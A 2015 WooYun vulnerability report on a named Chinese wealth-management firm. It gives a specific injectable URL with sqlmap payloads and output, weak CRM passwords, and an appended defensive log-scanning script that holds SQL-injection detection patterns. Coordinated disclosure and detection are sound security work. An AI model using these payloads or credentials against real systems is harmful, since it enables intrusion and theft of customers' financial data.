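Vulnerability Summary

Bug ID: wooyun-2015-0133287

Title: Vulnerabilities in 2 platforms of 新湖财富投资 can leak large amounts of customer wealth-management data / large numbers of employee passwords leaked (personal information, wealth-management products, etc.)

Vendor: 新湖财富投资

Author: 路人甲

Submitted: 2015-08-13 10:47

Fixed: 2015-09-28 10:50

Disclosed: 2015-09-28 10:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org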

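Vulnerability Details

Disclosure status:

2015-08-13: Details reported to the vendor; waiting for the vendor to handle them
2015-08-14: Vendor has confirmed; details disclosed to the vendor only
2015-08-24: Details disclosed to core white hats and experts in related fields
2015-09-03: Details disclosed to regular white hats
2015-09-13: Details disclosed to trainee white hats
2015-09-28: Details disclosed to the public

Brief description:

Vulnerabilities in 2 platforms of 新湖财富投资 can leak large amounts of customer wealth-management data / large numbers of employee passwords leaked (personal information, wealth-management products, etc.)

Detailed description:

http://www.xinhucaifu.com/news.php?id=198
On the main site, just about any parameter can be injected.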

[10:33:39] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 48 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=198) AND 8832=8832 AND (1107=1107
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: id=-7240) UNION ALL SELECT NULL,CONCAT(0x7167716871,0x4a4c7156656a41495666,0x716b676371),NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=198) AND SLEEP(5) AND (9760=9760
---
[10:33:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5.0.11
[10:33:49] [INFO] fetching database names
[10:33:50] [INFO] the SQL query used returns 2 entries
[10:33:50] [INFO] retrieved: "information_schema"
[10:33:50] [INFO] retrieved: "xinhucaifu"
available databases [2]:
[*] information_schema
[*] xinhucaifu



http://crm.xinhucaifu.com/login.jsp
The CRM has a large number of weak passwords.

Password: 888888

Password: 123456

Including but not limited to the accounts above; the vendor should run its own check as well.

Proof of vulnerability:

Fix:

Copyright notice: when reposting, credit the source 路人甲@乌云
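
A defensive check for the first finding, as an added example that is not part of the original report: it scans web access logs for non-numeric `id` values sent to `news.php` and labels them by the three techniques named in the sqlmap output above. The log lines, client addresses, labels and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, documentation IP addresses).
# The query strings reproduce the payload shapes from the sqlmap output, shortened.
SAMPLE_LOG = [
    '198.51.100.4 - - [11/Aug/2015:10:30:02 +0800] "GET /news.php?id=198 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [11/Aug/2015:10:33:39 +0800] "GET /news.php?id=198%29%20AND%208832%3D8832%20AND%20%281107%3D1107 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [11/Aug/2015:10:33:41 +0800] "GET /news.php?id=-7240%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 HTTP/1.1" 200 812',
    '203.0.113.7 - - [11/Aug/2015:10:33:44 +0800] "GET /news.php?id=198%29%20AND%20SLEEP%285%29%20AND%20%289760%3D9760 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [11/Aug/2015:10:40:10 +0800] "GET /news.php?id=198abc HTTP/1.1" 200 640',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Ordered rules, first match wins; one per technique sqlmap reported for 'id'.
RULES = [
    ("union-query", re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)),
    ("time-based-blind", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("boolean-blind", re.compile(r"\b(and|or)\b\s+\(?\s*(\d+)\s*=\s*\2\b", re.I)),
]

def classify_id(value):
    """Return None for a plain numeric id, otherwise a label for the anomaly."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    for label, pattern in RULES:
        if pattern.search(value):
            return label
    return "non-numeric-id"

def scan(lines, path="/news.php", param="id"):
    """Return (client_ip, label, decoded_value) for each suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group(2))
        if url.path != path:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            label = classify_id(value)
            if label:
                findings.append((m.group(1), label, value))
    return findings

if __name__ == "__main__":
    for ip, label, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{label}\t{value}")
```

The allow-list test in `classify_id` (digits only) is what catches the request; the rules only name the technique for triage.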


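Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-08-14 10:48

Vendor reply:

CNVD confirms the situation described and has notified the software vendor through the contact details published on its website.

Latest status:

None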